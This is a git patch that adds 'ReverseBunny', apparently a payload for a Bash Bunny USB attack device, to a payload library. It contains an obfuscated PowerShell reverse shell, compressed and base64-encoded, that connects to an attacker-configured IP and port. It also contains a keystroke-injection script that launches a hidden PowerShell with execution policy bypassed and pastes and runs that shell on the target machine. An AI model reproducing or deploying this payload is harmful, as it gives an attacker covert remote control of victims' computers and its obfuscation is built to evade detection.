From 80c724ad9960f1740448cddcc06414d6775a507a Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 10 Sep 2021 21:36:12 +0200 Subject: [PATCH] Uploaded ReverseBunny (#464) Obfuscated reverse shell via powershell --- .../remote_access/ReverseBunny/README.md | 12 ++++++++ .../ReverseBunny/ReverseBunny.txt | 1 + .../remote_access/ReverseBunny/payload.txt | 30 +++++++++++++++++++ 3 files changed, 43 insertions(+) create mode 100644 payloads/library/remote_access/ReverseBunny/README.md create mode 100644 payloads/library/remote_access/ReverseBunny/ReverseBunny.txt create mode 100644 payloads/library/remote_access/ReverseBunny/payload.txt diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md new file mode 100644 index 00000000..7f478362 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -0,0 +1,12 @@ +Title: ReverseBunny + +Author: 0iphor13 + +Version: 1.0 + + +Getting remote access via obfuscated reverse shell. +ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. + +# Red.............Payload running +# Green .............Finished diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt new file mode 100644 index 00000000..1aa4f158 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt @@ -0,0 +1 @@ +$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt new file mode 100644 index 00000000..7f45b871 --- /dev/null +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -0,0 +1,30 @@ +# Title: ReverseBunny +# Description: Obfuscated reverse shell, executed via powershell +# Author: 0iphor13 +# Version: 1.0 +# Category: Execution +# Attackmodes: HID, Storage + +GET SWITCH_POSITION +ATTACKMODE HID STORAGE +DUCKY_LANG de + +#LED RED - DON'T EJECT - PAYLOAD RUNNING + +LED R FAST + +DELAY 5000 +RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" +DELAY 2000 + +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" +DELAY 5000 +Q ENTER +DELAY 5000 +Q CONTROL v +DELAY 5000 +Q ENTER + +LED FINISH + +#SAVE TO EJECT \ No newline at end of file